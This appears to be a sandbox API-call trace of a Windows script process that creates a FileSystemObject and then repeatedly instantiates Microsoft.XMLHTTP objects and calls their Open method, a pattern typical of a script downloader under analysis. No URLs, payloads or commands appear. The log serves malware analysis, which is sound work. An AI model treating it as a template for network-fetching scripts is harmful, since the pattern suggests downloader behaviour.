	[0239.244] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0239.245] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0239.245] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0239.245] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0239.245] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0239.345] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0239.345] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0239.345] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0239.346] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.347] SysStringLen (param_1=0x0) returned 0x0
	[0239.347] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.347] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.347] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0239.347] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.347] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0239.347] ??2@YAPEAX_K@Z () returned 0x62f330
	[0239.347] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0239.347] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.347] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0239.347] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0239.347] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0239.347] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.347] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.350] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.350] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.350] SysStringLen (param_1=0x0) returned 0x0
	[0239.350] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.350] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.350] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72b0) returned 0x0
	[0239.350] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.350] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0239.350] ??2@YAPEAX_K@Z () returned 0x62f310
	[0239.350] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f310) 
	[0239.350] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.350] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0239.350] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72b0) returned 0x0
	[0239.350] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72b0) returned 0x3
	[0239.351] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.351] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.351] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.351] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.351] SysStringLen (param_1=0x0) returned 0x0
	[0239.351] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.351] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.351] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0239.351] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.351] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0239.351] ??2@YAPEAX_K@Z () returned 0x62f330
	[0239.351] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f330) 
	[0239.351] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.351] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0239.351] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0239.351] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0239.351] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.351] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.352] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.352] SysStringLen (param_1=0x0) returned 0x0
	[0239.352] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.352] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0239.352] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0239.352] ??2@YAPEAX_K@Z () returned 0x62f310
	[0239.352] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0239.352] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.352] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0239.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0239.352] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0239.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.352] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.353] longjmp () 
	[0239.353] longjmp () 
	[0239.353] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.353] SysStringLen (param_1=0x0) returned 0x0
	[0239.353] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.353] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0239.353] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7288) returned 0x0
	[0239.353] ??2@YAPEAX_K@Z () returned 0x62f330
	[0239.353] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7288, pUnkSite=0x62f330) 
	[0239.353] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.353] XMLHTTPRequest:IUnknown:Release (This=0x49c7288) returned 0x0
	[0239.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0239.353] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0239.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.353] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.354] longjmp () 
	[0239.354] longjmp () 
	[0239.354] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.354] SysStringLen (param_1=0x0) returned 0x0
	[0239.354] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.354] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0239.354] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0239.354] ??2@YAPEAX_K@Z () returned 0x62f310
	[0239.354] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0239.354] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.354] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0239.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0239.355] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
